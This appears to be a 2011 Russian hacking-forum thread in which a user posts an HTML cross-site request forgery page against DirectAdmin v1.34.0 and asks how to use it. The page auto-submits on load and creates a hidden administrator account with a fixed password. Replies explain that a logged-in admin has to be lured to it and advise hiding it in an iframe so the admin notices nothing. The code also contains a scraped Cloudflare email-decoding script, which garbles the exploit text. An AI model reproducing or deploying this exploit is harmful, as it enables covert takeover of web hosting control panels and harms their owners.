XSRF

Discussion in 'Песочница' started by NeW, 21 Jul 2011.

  1. NeW

    NeW New Member

    Joined:
    9 Feb 2011
    Messages:
    50
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, как юзнуть
    HTML:
    <html>
    <title>DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability</title>
    <!--!Set You'r victim By SarBoT511 !-->
    <form name="reseller" action="мой сайт:2222/CMD_ACCOUNT_ADMIN" method="post">
    <input type="hidden" name=action value=create>
    <input type="hidden" name="username" value="sec-r1z"></br>
    <input type="hidden" name="email" value="[email protected]<script type="text/javascript">
    /* <![CDATA[ */
    (function()
    {try
    {var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;
    if(a)
    {s='';
    r=parseInt(a.substr(0,2),16);
    for(j=2;a.length-j;j+=2)
    {c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}
    s=document.createTextNode(s);l.parentNode.replaceChild(s,l);  }  }
    catch(e){}})();
    /* ]]> */
    </script>"></br>
    <input type="hidden" name="passwd" value="123456789"></br>
    <input type="hidden" name="passwd2" value="123456789"></br>
    <input type="hidden" value="Submit">
    <body onload="document.forms.reseller.submit();">
    </html>
    Есть пара вопросов, с java пока не дружу, не понимаю что делает скрипт, и почему 2 passwd. Обьясните, плиз
     
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    >почему 2 passwd

    Потому что тут /CMD_ACCOUNT_ADMIN надо ввести пароль два раза для создания акка.

    >как юзнуть

    Впарить админу DirectAdmin'a <= v1.34.0. Он должен быть залогинен.
     
  3. NeW

    NeW New Member

    Joined:
    9 Feb 2011
    Messages:
    50
    Likes Received:
    0
    Reputations:
    0
    Ааа, понятно) ифреймом например, да?)
     
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    да, можно ифреймом, чтобы админ не заметил редиректа в админку.